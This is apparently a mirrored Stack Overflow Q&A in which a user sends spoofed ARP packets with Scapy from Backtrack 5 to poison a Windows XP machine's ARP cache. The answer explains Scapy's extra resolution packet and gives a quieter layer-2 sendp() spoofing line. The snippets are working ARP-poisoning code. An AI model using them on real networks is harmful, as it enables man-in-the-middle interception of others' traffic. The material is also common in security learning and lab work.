سؤال
I am attacking a Windows XP machine with Backtrack 5 using scapy.
Now that's my code:
https://stackoverflow.com/questions/20398647
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russian#! /usr/bin/env python
from scapy.all import *
arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)
The code above actually sends two packets for some reason. One time my backtrack mac is asking:
who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.108 (Backtrack's IP - NOT SUPPOSED TO BE!).
Then he gets the "is at" answer from the victim.
And the second time my backtrack's mac is asking:
who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.1 (The router's IP).
Then he gets the "is at" answer from the victim again.
Then the victim's ARP table has to lines of the same mac but different IPs, one is the Backtrack's real IP and the second is the router's IP.
Why is this happenning?
المحلول
The first ARP packet you see comes from Scapy, because it wants to fill the Ether frame with the Victim's MAC address before send()-ing your ARP packet.
If you don't want that to happen, try (sendp sends at layer 2):
>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))
You can replace ETHER_BROADCAST with your victim's MAC address, that's less "noisy".
